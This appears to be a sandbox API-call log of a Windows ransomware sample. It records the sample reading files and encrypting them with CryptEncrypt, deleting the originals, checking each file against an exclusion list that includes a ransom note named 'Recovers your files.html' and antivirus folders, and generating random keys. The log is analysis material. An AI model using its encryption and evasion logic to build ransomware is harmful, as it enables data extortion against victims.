ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.923] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.923] GetLastError () returned 0x0 [0152.923] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.923] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.923] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.923] GetLastError () returned 0x0 [0152.923] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.923] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.923] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.923] GetLastError () returned 0x0 [0152.923] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.924] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.924] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0152.924] GetLastError () returned 0x0 [0152.924] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0152.924] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0152.924] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0152.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui")) returned 0x20 [0152.924] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", dwFileAttributes=0x20) returned 0 [0152.924] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned 1 [0152.924] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui")) returned 0 [0152.925] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" [0152.925] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0152.925] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC873.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc873.tmp")) returned 0xc873 [0152.925] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC873.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc873.tmp"), dwFlags=0x1) returned 0 [0152.926] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC873.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc873.tmp")) returned 1 [0152.926] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0152.926] wcslen (_String="OK") returned 0x2 [0152.926] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0152.926] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0152.926] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0152.926] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0152.926] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0152.926] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*NMCRYPT") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*.exe") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*.dll") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*.lnk") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*.bat") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*.ini") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*.msi") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*.scf") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*AppData*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\java\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\windows\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*Atheros*") returned 0 [0152.926] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*Realtek*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*bootmgr*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*boot*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*boot*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*IO.SYS*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*ntldr*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*chrome*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*opera*") returned 0 [0152.927] PathMatchSpecW (pszFile="rtscom.dll.mui", pszSpec="*firefox*") returned 0 [0152.927] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", pszSpec="*") returned 1 [0152.927] strlen (_Str="NMoreira") returned 0x8 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: 